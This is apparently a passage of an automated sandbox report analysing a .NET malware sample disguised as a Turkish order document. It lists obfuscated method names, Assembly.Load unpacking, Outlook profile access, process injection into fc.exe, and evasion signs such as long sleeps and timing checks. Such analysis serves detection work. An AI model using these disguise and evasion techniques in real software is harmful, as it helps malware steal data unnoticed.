            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs .Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 9.2.fc.exe.339cd08.2.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 11.0.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 11.2.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.3b95cd08.0.raw.unpack, mainscreen.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: 0xDAD73746 [Mon May 6 15:31:18 2086 UTC]
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 0_2_07183AD7 push ebx; retf 0_2_07183ADA
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040C8DF push eax; ret 3_2_0040C8E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00403180 push eax; ret 3_2_00403182
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00404A99 push FFFFFFBBh; ret 3_2_00404A9B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004203D3 push esi; iretd 3_2_004203DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0041A3FC push eax; iretd 3_2_0041A425
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00416C49 push edi; iretd 3_2_00416C4C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00414499 push esi; ret 3_2_004144CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_004144A3 push esi; ret 3_2_004144CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040AE1C push 300DAF1Eh; ret 3_2_0040AE21
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0040C6C5 push 0000006Eh; ret 3_2_0040C6D1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_00404FCB push ds; iretd 3_2_00404FCC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C225F pushad ; ret 3_2_018C27F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C27FA pushad ; ret 3_2_018C27F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F09AD push ecx; mov dword ptr [esp], ecx 3_2_018F09B6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C283D push eax; iretd 3_2_018C2858
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C1368 push eax; iretd 3_2_018C1369
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D009AD push ecx; mov dword ptr [esp], ecx 9_2_02D009B6
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B074C push 00000047h; retf 9_2_003B07F8
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003B07D2 push 00000047h; retf 9_2_003B07F8
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AB196 push FFFFFF94h; iretd 9_2_003AB198
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AB186 push esi; iretd 9_2_003AB187
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A7279 push eax; iretd 9_2_003A72A2
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AD250 push esi; iretd 9_2_003AD25B
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003AD24A push esi; iretd 9_2_003AD25B
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A1320 push esi; ret 9_2_003A134C
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039D4A0 push esi; ret 9_2_0039D4AB
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00399542 push 0000006Eh; ret 9_2_0039954E
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00391916 push FFFFFFBBh; ret 9_2_00391918
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A3AC6 push edi; iretd 9_2_003A3AC9
            Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_00397C99 push 300DAF1Eh; ret 9_2_00397C9E
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: section name: .text entropy: 7.979735073551513
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs High entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QqlyG2yUroCQBSjlaj.cs High entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, lRVMMQ7c1IGVLKEkhr.cs High entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, emyWIGHbSXMIRhxwNX.cs High entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, GVjN9whr55tAhqTxFy.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, mxTpCXNb7RZS8xnVZu.cs High entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, idQ27mYX9UnZa99BEF.cs High entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, YE9vLiO8DUROdAZd9B.cs High entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, i7RJE7XwppAcletnM9.cs High entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, PO2kQtp1JBrSKZQBcm.csHigh entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QC27IVIPJyY2iLVvXQY.csHigh entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, NLihc4KTvML7Gt74oU.csHigh entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, RZotG5zHlXj2AtOOx9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, BYAiMKsC49DgNV7vk5.csHigh entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.csHigh entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, KYYaPOIITSshMUwPMtC.csHigh entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, DUJu7MF7E5pcBffxuY.csHigh entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QHdg36IxiiKlOn5o3Cc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, xtehnoGNiTQwATOPxp.csHigh entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, UnGAfJ2eZZ7CCMnQjv.csHigh entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe PID: 7512, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 7C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: A180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: B180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: C180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: D640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: E640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: F640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: FD00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193096E rdtsc 3_2_0193096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3531Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1039Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 436Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9535Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe TID: 7532Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep count: 436 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep time: -872000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fc.exe TID: 7204Thread sleep count: 9535 > 30Jump to behavior
